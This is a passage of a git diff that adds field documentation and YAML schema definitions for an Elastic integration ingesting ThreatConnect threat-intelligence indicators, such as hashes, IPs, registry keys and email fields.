+| threat_connect.indicator.associated_groups.data.body | The Emails body. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.first_name | First name of user. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.id | Unique Identifier of the user who created the group. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.last_name | Last name of user. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.owner | Owner of attribute creator. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.pseudonym | Pseudonym or alias of the user. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.user_name | Username of user. | keyword | +| threat_connect.indicator.associated_groups.data.date_added | Date and time group was added. | date | +| threat_connect.indicator.associated_groups.data.document.date_added | Date and time when the document was added. | date | +| threat_connect.indicator.associated_groups.data.document.type | The type of document. | keyword | +| threat_connect.indicator.associated_groups.data.down_vote_count | Downvote Intel Rating. | keyword | +| threat_connect.indicator.associated_groups.data.due_date | The date and time when the Task is due. | date | +| threat_connect.indicator.associated_groups.data.email_date | The date associated with an email. | date | +| threat_connect.indicator.associated_groups.data.escalation_date | The date and time when the Task should be escalated. | date | +| threat_connect.indicator.associated_groups.data.event_date | The date and time when the Event took place. | date | +| threat_connect.indicator.associated_groups.data.external.date.added | The date and time when the Group was created externally. | date | +| threat_connect.indicator.associated_groups.data.external.date.expires | The date and time when the Group expires externally. | date | +| threat_connect.indicator.associated_groups.data.external.last_modified | The date and time when the Group was last modified externally. | date | +| threat_connect.indicator.associated_groups.data.file.name | The file name of the Document. | keyword | +| threat_connect.indicator.associated_groups.data.file.size | The File size of the document. | keyword | +| threat_connect.indicator.associated_groups.data.file.text | The file text of the Signature. | keyword | +| threat_connect.indicator.associated_groups.data.file.type | The file type of the SignaturePossible values are Bro, ClamAV, CybOX, Iris Search Hash, KQL, OpenIOC, Regex, SPL, Sigma, Snort, Suricata, TQL Query and YARA. | keyword | +| threat_connect.indicator.associated_groups.data.first_seen | The date and time when the Group was first seen. | date | +| threat_connect.indicator.associated_groups.data.from | The Emails subject. | keyword | +| threat_connect.indicator.associated_groups.data.generated_report | Indicates whether the report is generated. | boolean | +| threat_connect.indicator.associated_groups.data.header | The Emails header. | keyword | +| threat_connect.indicator.associated_groups.data.id | Unique Identifier of Group. | keyword | +| threat_connect.indicator.associated_groups.data.last_modified | Date and time when the document was last updated. | date | +| threat_connect.indicator.associated_groups.data.last_seen | The date and time when the Group was last seen. | date | +| threat_connect.indicator.associated_groups.data.legacy_link | Legacy link to the group's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_groups.data.malware | Indicates whether the Document is malware. | boolean | +| threat_connect.indicator.associated_groups.data.name | The Groups name. | keyword | +| threat_connect.indicator.associated_groups.data.owner.id | The ID of the owner to which the Group belongs. | keyword | +| threat_connect.indicator.associated_groups.data.owner.name | The name of the owner to which the Group belongs. | keyword | +| threat_connect.indicator.associated_groups.data.password | The password associated with the Document. | keyword | +| threat_connect.indicator.associated_groups.data.publish_date | The date and time when the Report was published. | date | +| threat_connect.indicator.associated_groups.data.reminder_date | The date and time when a reminder about the Task will be sent. | date | +| threat_connect.indicator.associated_groups.data.score_breakdown | A breakdown or explanation of the score, providing additional information about how the score was determined. | keyword | +| threat_connect.indicator.associated_groups.data.score_includes_body | Indicates whether the score includes information from the email body. | boolean | +| threat_connect.indicator.associated_groups.data.status | The status of the Group type. | keyword | +| threat_connect.indicator.associated_groups.data.subject | The Emails From field. | keyword | +| threat_connect.indicator.associated_groups.data.to | The receiver email address. | keyword | +| threat_connect.indicator.associated_groups.data.type | The type of Group being created. Possiblevalues :Adversary, AttackPattern, Campaign, CourseofAction, Document, Email, Event, Incident, IntrusionSet, Malware, Report, Signature, Tactic, Task, Threat, Tool and Vulnerability. | keyword | +| threat_connect.indicator.associated_groups.data.up_vote | Use this field to update the Groups Intel Rating. | boolean | +| threat_connect.indicator.associated_groups.data.up_vote_count | Upvote Intel Rating. | keyword | +| threat_connect.indicator.associated_groups.data.web_link | Link to the group's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_groups.data.xid | The Groups XID. | keyword | +| threat_connect.indicator.associated_indicators.data.active.locked | Indicates whether the active status is locked. | boolean | +| threat_connect.indicator.associated_indicators.data.active.value | Indicates whether the indicator is active. | boolean | +| threat_connect.indicator.associated_indicators.data.address | The email address associated with the Email Address Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.as_number | The AS number associated with the ASN Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.block | The block of network IP addresses associated with the CIDR Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.confidence | The Indicators Confidence Rating. | long | +| threat_connect.indicator.associated_indicators.data.date_added | Date and time when the indicator was added. | date | +| threat_connect.indicator.associated_indicators.data.description | Description of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.dns_active | Indicates whether the DNS feature is active for the Host Indicator. | boolean | +| threat_connect.indicator.associated_indicators.data.external.date.added | The date and time when the Indicator was created externally. | date | +| threat_connect.indicator.associated_indicators.data.external.date.expires | The date and time when the Indicator expires externally. | date | +| threat_connect.indicator.associated_indicators.data.external.last_modified | The date and time when the Indicator was last modified externally. | date | +| threat_connect.indicator.associated_indicators.data.first_seen | The date and time when the Indicator was first seen. | date | +| threat_connect.indicator.associated_indicators.data.hashtag | The hashtag term associated with the Hashtag Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.host_name | The host name associated with the Host Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.id | Unique identifier for the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.ip | The IP address associated with the Address Indicator. | ip | +| threat_connect.indicator.associated_indicators.data.key_name | The name of the registry key associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.last_modified | Date and time when the indicator was last modified. | date | +| threat_connect.indicator.associated_indicators.data.last_seen | The date and time when the Indicator was last seen. | date | +| threat_connect.indicator.associated_indicators.data.legacy_link | Legacy link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_indicators.data.md5 | MD5 hash value associated with the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.mutex | The synchronization primitive used to identify malware files that is associated with the Mutex. | keyword | +| threat_connect.indicator.associated_indicators.data.owner.id | Identifier for the owner of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.owner.name | Name of the organization that owns the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.private_flag | Indicates whether the indicator is marked as private. | boolean | +| threat_connect.indicator.associated_indicators.data.rating | The Indicators Threat Rating. | double | +| threat_connect.indicator.associated_indicators.data.sha1 | The SHA1 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.sha256 | The SHA256 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.size | The size of the file associated with the File Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.subject | The subject line of the email associated with the Email Subject Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.summary | Summary or description of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.text | The URL associated with the URL Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.type | Type of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.user_agent_string | The characteristic identification string associated with the User Agent Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.value.name | The registry value associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.value.type | Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ. | keyword | +| threat_connect.indicator.associated_indicators.data.web_link | Link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_indicators.data.whois_active | Indicates whether the Whois feature is active for the Host Indicator. | boolean | +| threat_connect.indicator.attributes.data.created_by.first_name | First name of the user who created the victim attribute. | keyword | +| threat_connect.indicator.attributes.data.created_by.id | Unique Identifier of the user who created the attribute. | keyword | +| threat_connect.indicator.attributes.data.created_by.last_name | Lastname of the user who created the victim attribute. | keyword | +| threat_connect.indicator.attributes.data.created_by.owner | Owner of attribute creator. | keyword | +| threat_connect.indicator.attributes.data.created_by.pseudonym | Pseudonym or alias of the user. | keyword | +| threat_connect.indicator.attributes.data.created_by.user_name | Username of the user who created the victim attribute. | keyword | +| threat_connect.indicator.attributes.data.date_added | Date and time when the attribute was added. | date | +| threat_connect.indicator.attributes.data.default | Indicates whether the Attribute is the default Attribute of its type for the Indicator to which it is added (this field applies to certain Attribute and data types only). | boolean | +| threat_connect.indicator.attributes.data.id | Unique Identifier of attribute. | keyword | +| threat_connect.indicator.attributes.data.last_modified | Date and time when attribute was modified. | date | +| threat_connect.indicator.attributes.data.pinned | Indicates whether the Attribute is to be displayed as a Pinned Attribute on the Details screen for the Indicator to which the Attribute is added. | boolean | +| threat_connect.indicator.attributes.data.source | The Attributes source. | keyword | +| threat_connect.indicator.attributes.data.type | The Attributes type. | keyword | +| threat_connect.indicator.attributes.data.value | The Attributes value. | keyword | +| threat_connect.indicator.block | The block of network IP addresses associated with the CIDR Indicator. | keyword | +| threat_connect.indicator.confidence | The Indicators Confidence Rating. | long | +| threat_connect.indicator.custom_associations | Includes indicators with custom associations to the indicator. | flattened | +| threat_connect.indicator.date_added | Date and time when the indicator was added. | date | +| threat_connect.indicator.deleted_at | Date when the IOC was expired/deleted. | date | +| threat_connect.indicator.description | Description of the indicator. | keyword | +| threat_connect.indicator.dns_active | Indicates whether the DNS feature is active for the Host Indicator. | boolean | +| threat_connect.indicator.dns_resolution | Includes DNS resolution data related to the Host indicators. | flattened | +| threat_connect.indicator.enrichment | Includes Enrichment data related to the indicator. | flattened | +| threat_connect.indicator.expiration_duration | Duration when the IOC will expire. | keyword | +| threat_connect.indicator.external.date.added | The date and time when the Indicator was created externally. | date | +| threat_connect.indicator.external.date.expires | The date and time when the Indicator expires externally. | date | +| threat_connect.indicator.external_last.modified | The date and time when the Indicator was last modified externally. | date | +| threat_connect.indicator.false_positive_reported_by_user | Indicates whether false positive is reported by user. | boolean | +| threat_connect.indicator.false_positives | Count of false positives. | long | +| threat_connect.indicator.file_actions | A list of File Actions associated with the File Indicator. | flattened | +| threat_connect.indicator.file_occurrences | A list of File Occurrences associated with the File Indicator. | flattened | +| threat_connect.indicator.first_seen | The date and time when the Indicator was first seen. | date | +| threat_connect.indicator.generic_custom_indicator_values | Includes the fields over-writing the custom field names: value1, value2, and value3. | flattened | +| threat_connect.indicator.geo_location | Includes GEO location information related to the Host and IP indicators. | flattened | +| threat_connect.indicator.hashtag | The hashtag term associated with the Hashtag Indicator. | keyword | +| threat_connect.indicator.host_name | The host name associated with the Host Indicator. | keyword | +| threat_connect.indicator.id | Unique identifier for the indicator. | keyword | +| threat_connect.indicator.investigation_links | Includes investigation links related to the indicator type. | flattened | +| threat_connect.indicator.ip | The IP address associated with the Address Indicator. | ip | +| threat_connect.indicator.key_name | The name of the registry key associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.last_false_positive | Date and time of last false positive. | date | +| threat_connect.indicator.last_modified | Date and time when the indicator was last modified. | date | +| threat_connect.indicator.last_seen | The date and time when the Indicator was last seen. | date | +| threat_connect.indicator.legacy_link | Legacy link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.md5 | MD5 hash value associated with the indicator. | keyword | +| threat_connect.indicator.mutex | The synchronization primitive used to identify malware files that is associated with the Mutex. | keyword | +| threat_connect.indicator.observations | Includes the Observations fields. | flattened | +| threat_connect.indicator.owner.id | Identifier for the owner of the indicator. | keyword | +| threat_connect.indicator.owner.name | Name of the organization that owns the indicator. | keyword | +| threat_connect.indicator.private_flag | Indicates whether the indicator is marked as private. | boolean | +| threat_connect.indicator.rating | The Indicators Threat Rating. | double | +| threat_connect.indicator.security_labels.data.color | Color associated with the security label. | keyword | +| threat_connect.indicator.security_labels.data.date_added | The date and time when the security label was added. | date | +| threat_connect.indicator.security_labels.data.description | Description of the security label. | keyword | +| threat_connect.indicator.security_labels.data.id | Unique identifier for the security label. | keyword | +| threat_connect.indicator.security_labels.data.name | Actual name or label of the security classification. | keyword | +| threat_connect.indicator.security_labels.data.owner | The entity or system that owns or manages the security label. | keyword | +| threat_connect.indicator.security_labels.data.source | The source of the security label. | keyword | +| threat_connect.indicator.sha1 | The SHA1 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.sha256 | The SHA256 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.size | The size of the file associated with the File Indicator. | keyword | +| threat_connect.indicator.source | The Indicators source. | keyword | +| threat_connect.indicator.subject | The subject line of the email associated with the Email Subject Indicator. | keyword | +| threat_connect.indicator.summary | Summary or description of the indicator. | keyword | +| threat_connect.indicator.tags.data.description | The Tags description. | keyword | +| threat_connect.indicator.tags.data.id | Unique Identifier of tag. | keyword | +| threat_connect.indicator.tags.data.last_used | Date and time when tag was last used. | date | +| threat_connect.indicator.tags.data.name | Name of tag. | keyword | +| threat_connect.indicator.tags.data.owner | The Organization, Community, or Source to which the Tag belongs. | keyword | +| threat_connect.indicator.tags.data.platforms.count | Count of platforms. | long | +| threat_connect.indicator.tags.data.platforms.data | Platform on which tag is added. | keyword | +| threat_connect.indicator.tags.data.technique.id | Unique Identifier of tag technique. | keyword | +| threat_connect.indicator.text | The URL associated with the URL Indicator. | keyword | +| threat_connect.indicator.threat_assess.confidence | The confidence level associated with the threat assessment. | double | +| threat_connect.indicator.threat_assess.rating | A numerical rating indicating the threat assessment level. | double | +| threat_connect.indicator.threat_assess.score.false_positive | The count of false positives associated with the threat assessment score. | long | +| threat_connect.indicator.threat_assess.score.observed | The observed value associated with the threat assessment score. | long | +| threat_connect.indicator.threat_assess.score.value | The overall score assigned to the threat, indicating its severity or risk. | long | +| threat_connect.indicator.tracked_users | Includes Observations and False Positive stats of tracked users. | flattened | +| threat_connect.indicator.type | Type of the indicator (e.g., File, IP address). | keyword | +| threat_connect.indicator.user_agent_string | The characteristic identification string associated with the User Agent Indicator. | keyword | +| threat_connect.indicator.value.name | The registry value associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.value.type | Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ. | keyword | +| threat_connect.indicator.web_link | Link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.who_is | Includes WhoIs information related to the Host indicators. | flattened | +| threat_connect.indicator.whois_active | Indicates whether the Whois feature is active for the Host Indicator. | boolean | + diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/agent.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/agent.yml new file mode 100644 index 00000000000..da4e652c53b --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/agent.yml @@ -0,0 +1,198 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/base-fields.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/base-fields.yml new file mode 100644 index 00000000000..5117c5c2edf --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/base-fields.yml @@ -0,0 +1,16 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: threat.feed.name + type: constant_keyword + description: Display friendly feed name. + value: ThreatConnect Indicator diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/beats.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/beats.yml new file mode 100644 index 00000000000..b3701b581cf --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/beats.yml @@ -0,0 +1,9 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/ecs.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/ecs.yml new file mode 100644 index 00000000000..756416541c7 --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/ecs.yml @@ -0,0 +1,64 @@ +- name: email.from.address + type: keyword +- name: email.subject + type: keyword +- name: email.to.address + type: keyword +- name: event.category + type: keyword +- name: event.id + type: keyword +- name: event.kind + type: keyword +- name: event.type + type: keyword +- name: observer.hostname + type: keyword +- name: os.family + type: keyword +- name: related.hash + type: keyword +- name: related.ip + type: ip +- name: related.user + type: keyword +- name: threat.indicator.as.number + type: long +- name: threat.indicator.confidence + type: keyword +- name: threat.indicator.description + type: keyword +- name: threat.indicator.email.address + type: keyword +- name: threat.indicator.file.hash.md5 + type: keyword +- name: threat.indicator.file.hash.sha1 + type: keyword +- name: threat.indicator.file.hash.sha256 + type: keyword +- name: threat.indicator.first_seen + type: date +- name: threat.indicator.ip + type: ip +- name: threat.indicator.last_seen + type: date +- name: threat.indicator.marking.tlp + type: keyword +- name: threat.indicator.modified_at + type: date +- name: threat.indicator.reference + type: keyword +- name: threat.indicator.registry.data.type + type: keyword +- name: threat.indicator.registry.path + type: keyword +- name: threat.indicator.registry.value + type: keyword +- name: threat.indicator.type + type: keyword +- name: threat.indicator.url.original + type: keyword +- name: threat.technique.id + type: keyword +- name: user_agent.original + type: keyword diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/fields.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/fields.yml new file mode 100644 index 00000000000..b193da3a3eb --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/fields.yml @@ -0,0 +1,648 @@ +- name: threat_connect + type: group + fields: + - name: indicator + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: associated_artifacts + type: flattened + description: A list of Artifacts associated to the Indicator. + - name: associated_cases + type: flattened + description: A list of Cases associated to the Indicator. + - name: associated_groups + type: group + fields: + - name: data + type: group + fields: + - name: assignments + type: group + fields: + - name: data + type: group + fields: + - name: type + type: keyword + description: Valid values for the type of assignment are Assigned and Escalate. + - name: user + type: group + fields: + - name: id + type: keyword + description: Unique identifier of users assigned to the Task or to whom the Task will be escalated. + - name: body + type: keyword + description: The Emails body. + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of user. + - name: id + type: keyword + description: Unique Identifier of the user who created the group. + - name: last_name + type: keyword + description: Last name of user. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of user. + - name: date_added + type: date + description: Date and time group was added. + - name: document + type: group + fields: + - name: date_added + type: date + description: Date and time when the document was added. + - name: type + type: keyword + description: The type of document. + - name: down_vote_count + type: keyword + description: Downvote Intel Rating. + - name: due_date + type: date + description: The date and time when the Task is due. + - name: email_date + type: date + description: The date associated with an email. + - name: escalation_date + type: date + description: The date and time when the Task should be escalated. + - name: event_date + type: date + description: The date and time when the Event took place. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Group was created externally. + - name: expires + type: date + description: The date and time when the Group expires externally. + - name: last_modified + type: date + description: The date and time when the Group was last modified externally. + - name: file + type: group + fields: + - name: name + type: keyword + description: The file name of the Document. + - name: size + type: keyword + description: The File size of the document. + - name: text + type: keyword + description: The file text of the Signature. + - name: type + type: keyword + description: The file type of the SignaturePossible values are Bro,ClamAV,CybOX,Iris Search Hash,KQL,OpenIOC,Regex,SPL,Sigma,Snort,Suricata,TQL Query,YARA. + - name: first_seen + type: date + description: The date and time when the Group was first seen. + - name: from + type: keyword + description: The Emails subject. + - name: generated_report + type: boolean + description: Indicates whether the report is generated. + - name: header + type: keyword + description: The Emails header. + - name: id + type: keyword + description: Unique Identifier of Group. + - name: last_modified + type: date + description: Date and time when the document was last updated. + - name: last_seen + type: date + description: The date and time when the Group was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the group's details in the ThreatConnect web application. + - name: malware + type: boolean + description: Indicates whether the Document is malware. + - name: name + type: keyword + description: The Groups name. + - name: owner + type: group + fields: + - name: id + type: keyword + description: The ID of the owner to which the Group belongs. + - name: name + type: keyword + description: The name of the owner to which the Group belongs. + - name: password + type: keyword + description: The password associated with the Document. + - name: publish_date + type: date + description: The date and time when the Report was published. + - name: reminder_date + type: date + description: The date and time when a reminder about the Task will be sent. + - name: score_breakdown + type: keyword + description: A breakdown or explanation of the score, providing additional information about how the score was determined. + - name: score_includes_body + type: boolean + description: Indicates whether the score includes information from the email body. + - name: status + type: keyword + description: The status of the Group type. + - name: subject + type: keyword + description: The Emails From field. + - name: to + type: keyword + description: The receiver email address. + - name: type + type: keyword + description: The type of Group being created.Possiblevalues:Adversary,AttackPattern,Campaign,CourseofAction,Document,Email,Event,Incident,IntrusionSet,Malware,Report,Signature,Tactic,Task,Threat,Tool, Vulnerability. + - name: up_vote + type: boolean + description: Use this field to update the Groups Intel Rating. + - name: up_vote_count + type: keyword + description: Upvote Intel Rating. + - name: web_link + type: keyword + description: Link to the group's details in the ThreatConnect web application. + - name: xid + type: keyword + description: The Groups XID. + - name: associated_indicators + type: group + fields: + - name: data + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: last_modified + type: date + description: The date and time when the Indicator was last modified externally. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. + - name: id + type: keyword + description: Unique identifier for the indicator. + - name: ip + type: ip + description: The IP address associated with the Address Indicator. + - name: key_name + type: keyword + description: The name of the registry key associated with the Registry Key Indicator. + - name: last_modified + type: date + description: Date and time when the indicator was last modified. + - name: last_seen + type: date + description: The date and time when the Indicator was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the indicator's details in the ThreatConnect web application. + - name: md5 + type: keyword + description: MD5 hash value associated with the indicator. + - name: mutex + type: keyword + description: The synchronization primitive used to identify malware files that is associated with the Mutex. + - name: owner + type: group + fields: + - name: id + type: keyword + description: Identifier for the owner of the indicator. + - name: name + type: keyword + description: Name of the organization that owns the indicator. + - name: private_flag + type: boolean + description: Indicates whether the indicator is marked as private. + - name: rating + type: double + description: The Indicators Threat Rating. + - name: sha1 + type: keyword + description: The SHA1 hash associated with the File Indicator. + - name: sha256 + type: keyword + description: The SHA256 hash associated with the File Indicator. + - name: size + type: keyword + description: The size of the file associated with the File Indicator. + - name: subject + type: keyword + description: The subject line of the email associated with the Email Subject Indicator. + - name: summary + type: keyword + description: Summary or description of the indicator. + - name: text + type: keyword + description: The URL associated with the URL Indicator. + - name: type + type: keyword + description: Type of the indicator. + - name: user_agent_string + type: keyword + description: The characteristic identification string associated with the User Agent Indicator. + - name: value + type: group + fields: + - name: name + type: keyword + description: The registry value associated with the Registry Key Indicator. + - name: type + type: keyword + description: Possible values:REG_NONE,REG_BINARY,REG_DWORD,REG_DWORD_LITTLE_ENDIAN,REG_DWORD_BIG_ENDIAN,REG_EXPAND_SZ,REG_LINK,REG_MULTI_SZ,REG_QWORD,REG_QWORD_LITTLE_ENDIAN,REG_SZ. + - name: web_link + type: keyword + description: Link to the indicator's details in the ThreatConnect web application. + - name: whois_active + type: boolean + description: Indicates whether the Whois feature is active for the Host Indicator. + - name: attributes + type: group + fields: + - name: data + type: group + fields: + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of the user who created the victim attribute. + - name: id + type: keyword + description: Unique Identifier of the user who created the attribute. + - name: last_name + type: keyword + description: Lastname of the user who created the victim attribute. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of the user who created the victim attribute. + - name: date_added + type: date + description: Date and time when the attribute was added. + - name: default + type: boolean + description: Indicates whether the Attribute is the default Attribute of its type for the Indicator to which it is added (this field applies to certain Attribute and data types only). + - name: id + type: keyword + description: Unique Identifier of attribute. + - name: last_modified + type: date + description: Date and time when attribute was modified. + - name: pinned + type: boolean + description: Indicates whether the Attribute is to be displayed as a Pinned Attribute on the Details screen for the Indicator to which the Attribute is added. + - name: source + type: keyword + description: The Attributes source. + - name: type + type: keyword + description: The Attributes type. + - name: value + type: keyword + description: The Attributes value. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: custom_associations + type: flattened + description: Includes indicators with custom associations to the indicator. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: deleted_at + type: date + description: Date when the IOC was expired/deleted. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: dns_resolution + type: flattened + description: Includes DNS resolution data related to the Host indicators. + - name: enrichment + type: flattened 